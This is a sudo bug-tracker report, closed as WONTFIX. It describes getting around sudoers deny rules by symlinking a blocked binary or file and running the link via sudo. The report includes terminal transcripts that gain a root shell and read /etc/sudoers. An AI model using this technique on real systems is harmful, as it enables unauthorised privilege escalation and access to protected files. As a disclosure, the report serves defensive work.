Bug 1009

Summary: Bypass Sudo Editing block on any blocked file
Product: Sudo Reporter: Tommy (dawgyg) DeVoss <dawgyg>
Component: SudoAssignee: Todd C. Miller <Todd.Miller>
Status: RESOLVED WONTFIX    
Severity: high    
Priority: high    
Version: 1.8.32   
Hardware: All   
OS: Linux   

Description Tommy (dawgyg) DeVoss 2021-11-21 22:20:06 MST
When you add a user to sudoers file, and attempt to block them from editing specific files you can do this by the following:

username   ALL=ALL, !/usr/bin/su

This will prevent the user from running the sudo su command to get a root shell.

I have found that the following exploit will work:

1c44h1wy7i@pd-lpsrtlus498:~$ sudo su
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/su' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /usr/bin/su su_exploit
1c44h1wy7i@pd-lpsrtlus498:~$ sudo ./su_exploit
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@pd-lpsrtlus498:/home/AMBERJACK/1c44h1wy7i# 


This works for any file that has been explicitly blacklisted. And can also be used to edit blacklisted files. 

1c44h1wy7i@pd-lpsrtlus498:~$ cat /etc/sudoers
cat: /etc/sudoers: Permission denied
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat /etc/sudoers
Sorry, user 1c44h1wy7i is not allowed to execute '/usr/bin/cat /etc/sudoers' as root on pd-lpsrtlus498.amberjack.launchpoint.
1c44h1wy7i@pd-lpsrtlus498:~$ ln -s /etc/sudoers sudoers_exp
1c44h1wy7i@pd-lpsrtlus498:~$ sudo cat sudoers_exp
# testing
# This file MUST be edited with the 'visudo' command as root.
#
# Please consider adding local content in /etc/sudoers.d/ instead of
# directly modifying this file.
#
# See the man page for details on how to write a sudoers file.
#


This appears to work on any version of sudo 1.8.x (including the default sudo 1.8.31/32 available on Ubuntu 20)

It is patched on Sudo version 1.9.5p2 installed on my Fedora box. (not sure what version patched it)
Comment 1 Tommy (dawgyg) DeVoss 2021-11-21 22:39:52 MST
It isnt fixed in latest. I had a typo in my sudoers file. So it works on any version including latest